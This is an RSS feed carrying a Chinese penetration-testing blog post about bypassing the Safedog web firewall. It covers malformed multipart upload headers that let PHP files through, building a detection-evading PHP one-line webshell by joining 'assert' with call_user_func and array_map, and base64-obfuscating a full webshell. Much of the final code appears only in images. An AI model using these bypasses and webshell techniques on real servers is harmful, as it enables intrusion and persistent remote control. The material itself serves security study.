<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>安全狗 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E5%AE%89%E5%85%A8%E7%8B%97/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Thu, 17 May 2018 12:49:34 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>我与某狗的恩恩怨怨</title>
		<link>/web/355.html</link>
					<comments>/web/355.html#comments</comments>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Tue, 13 Feb 2018 20:41:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[一句话]]></category>
		<category><![CDATA[免杀]]></category>
		<category><![CDATA[安全狗]]></category>
		<category><![CDATA[木马]]></category>
		<category><![CDATA[过狗]]></category>
		<guid isPermaLink="false">/?p=224</guid>

					<description><![CDATA[原创文章，转载请标明出处！ 0x00 介绍 鲁迅说:偷窃一个的是创意剽窃，偷窃很多人的创意是研究。 本文是个人学习的一个小总结，很多思路都是学习网上大佬的，可能本文中的某个思路或许...]]></description>
										<content:encoded><![CDATA[<blockquote><p>原创文章，转载请标明出处！</p></blockquote>
<h1>0x00 介绍</h1>
<blockquote><p>鲁迅说:偷窃一个的是创意剽窃，偷窃很多人的创意是研究。</p></blockquote>
<p><img src="/wp-content/uploads/2018/02/4183059126.jpg" alt="1.jpg" title="1.jpg"><br />本文是个人学习的一个小总结，很多思路都是学习网上大佬的，可能本文中的某个思路或许已经被公布，但是我阅历比较少，并不知道，如果有重复的，可以提出来，我会文章后面贴上地址。</p>
<h1>0x01 上传绕过</h1>
<pre><code>说到突破狗绕过，公布的姿势太多了，常规的后缀大小写修改、截断上传、不规则文件名截断、删除Conten-Type、垃圾数据填充等。我简单的总结下。</code></pre>
<h2>环境</h2>
<p><strong>Windows版某狗ApacheV3.5+phpstudy</strong><br /><img src="/wp-content/uploads/2018/02/3448019682.jpg" alt="2.jpg" title="2.jpg"><br />说道这里，可能有人会吐槽你这是V3.5的不是还有个V4.0的嘛，什么文章啊垃圾。关于版本问题我以前写过一篇水文，绕的是V4.0加服务器<span class="wpcom_tag_link"><a href="/tags/%e5%ae%89%e5%85%a8%e7%8b%97" title="安全狗" target="_blank">安全狗</a></span>，不多说直接上图。<br /><img src="/wp-content/uploads/2018/02/1063662340.jpg" alt="3.jpg" title="3.jpg"><br />其实版本是有差异但是方法都是一样的。</p>
<h2>绕过</h2>
<p>Burp抓包  <strong>原本数据包</strong></p>
<pre><code>------WebKitFormBoundaryl2Fe3Re3WQjeJFBi
Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;1.php&quot;
Content-Type: application/octet-stream</code></pre>
<p>思路：改变大小写+垃圾数据填充+删除<br />主要从这里入手<br /><code>Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;1.php&quot;</code><br /><img src="/wp-content/uploads/2018/02/4218763905.jpg" alt="4.jpg" title="4.jpg"><br /><code>Content-Disposition:</code>大写<code>C</code>改为小写<code>c</code><br /><img src="/wp-content/uploads/2018/02/1120295546.jpg" alt="5.jpg" title="5.jpg"><br /> <code>form-data;</code>前面加<code>zz</code><br /><img src="/wp-content/uploads/2018/02/1695878997.jpg" alt="6.jpg" title="6.jpg"><br /> <code>form-data;</code>把<code>f</code>去掉<br /> 上面三个例子只是简单的一个小例子，我想给大家说的其实是，我们可以下面的数据<code>为所欲为</code><br /> <code>Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;1.php&quot;</code><br />比如随便删除，修改，回车，增添，倒转都可以，然后你会发现绕狗上传是如此简单。<br />下面介绍几个有趣点的:<br /><code>filename=&quot;4.php&quot;</code>改成<code>filename=4.php filename&quot;&quot;</code><br /><img src="/wp-content/uploads/2018/02/3817393004.jpg" alt="7.jpg" title="7.jpg"><br />倒转把<code>Content-Type: application/octet-stream</code>提到上面来<br /><img src="/wp-content/uploads/2018/02/3911719939.jpg" alt="8.jpg" title="8.jpg"><br />把<code>name=&quot;file&quot;</code>提到前面来<br /><code>Content-Disposition: name=&quot;file&quot;; form-data;  filename=&quot;6.php&quot;</code><br />回车:<br /><img src="/wp-content/uploads/2018/02/5796017.jpg" alt="9.jpg" title="9.jpg"><br />还有 <code>&quot; ' ; </code></p>
<pre><code>filename=&quot;&quot;xx.php&quot;  //加个双引号
filename=&quot;;xx.php&quot;  //加个分号
filename=&quot;'xx.php&quot;  //加个单引号</code></pre>
<p>就到这里告一段落了，关于狗的版本差异问题没多大，上面的方法试试，然后就可以找到了，大家可以多动手，发挥脑洞，这类方法也可以在其他WAF试试，给大家提供些思路<code>协议未覆盖</code>，<code>Fuzz模糊测试突破文件上传</code>。</p>
<h1>0x02 <span class="wpcom_tag_link"><a href="/tags/%e5%85%8d%e6%9d%80" title="免杀" target="_blank">免杀</a></span><span class="wpcom_tag_link"><a href="/tags/%e4%b8%80%e5%8f%a5%e8%af%9d" title="一句话" target="_blank">一句话</a></span></h1>
<p>这里我详细讲解一个<span class="wpcom_tag_link"><a href="/tags/%e8%bf%87%e7%8b%97" title="过狗" target="_blank">过狗</a></span>过D盾的php一句话的编写。在Tool论坛分享过</p>
<ul>
<li>先来看看我们常见的PHP一句话长啥样</li>
</ul>
<p>&#8220;<br />首先我们需要了解两个PHP函数 <code>call_user_func()</code>和<code>array_map()</code></p>
<ul>
<li>call_user_func()</li>
</ul>
<pre><code>function uu($x,$y){     //定义了一个uu的函数 参数为变量 $x,$y
        return $x.$y;      //返回值为 是将$x和$y拼接
}
echo @call_user_func('uu',Too,ls);  //将&quot;Too,ls&quot;分别传给 $x , $y ,组成Tools，  echo输出Tools @是防止报错</code></pre>
<p>运行结果<br /><img src="/wp-content/uploads/2018/02/519987570.png" alt="1tools.png" title="1tools.png"><br />大家知道 assert是PHP一句话中常见的执行函数</p>
<pre><code>function uu($x,$y){
        return $x.$y;
}
echo @call_user_func('uu',ass,ert);</code></pre>
<p>如果我们这样写是不是就组成了assert, 满足文章开头常见一句话的特征咯。</p>
<ul>
<li>array_map()</li>
</ul>
<p>看个小例子i<br /><img src="/wp-content/uploads/2018/02/1680984110.png" alt="tool3.png" title="tool3.png"><br />效果: 大家只要记住 $arr可以是个数组<br /><img src="/wp-content/uploads/2018/02/260084894.png" alt="2tools.png" title="2tools.png"><br />如果我们这样写，也算个数组了，看到这里很多小伙伴灵机一动<br /><code>$i = array($_POST[x]);</code></p>
<ul>
<li>编写一句话</li>
</ul>
<p>把上述的列子结合起来就可以了<br /><img src="/wp-content/uploads/2018/02/330229302.png" alt="tools4.png" title="tools4.png"><br />去掉注释比较方便。</p>
<p>是免杀的，过狗的可以的<br /><img src="/wp-content/uploads/2018/02/2918387524.png" alt="tool5.png" title="tool5.png"></p>
<ul>
<li>总结</li>
</ul>
<p>主要是用各种方法拼接组合相关执行函数，然后运用回调函数的方法来执行。免杀可能是一时的，但是思路是活的，大家可以去学学php基础，也可以轻易写出免杀的一句话。</p>
<h1>0x03 免杀大马</h1>
<p><a href="https://www.t00ls.net/thread-44213-1-1.html">思路来源</a></p>
<ul>
<li>首先需要一份大马源码</li>
</ul>
<p><img src="/wp-content/uploads/2018/02/3435870925.png" alt="tools5.png" title="tools5.png"></p>
<ul>
<li>思路</li>
</ul>
<pre><code>// base64_decode函数的作用是对base64编码过的数据进行解码
</code></pre>
<ul>
<li>免杀</li>
</ul>
<p><img src="/wp-content/uploads/2018/02/4139391286.png" alt="tools6.png" title="tools6.png"><br />有人说这只是静态免杀，大马操作时候还会拦截，然而并不会。<br />我在大马上执行命令还是不会拦截。<br /><img src="/wp-content/uploads/2018/02/2023285932.png" alt="tools7.png" title="tools7.png"></p>
<h1>总结</h1>
<p><strong>我们是站在前人的肩膀上成长起来的。</strong></p>
]]></content:encoded>
					
					<wfw:commentRss>/web/355.html/feed</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
	</channel>
</rss>
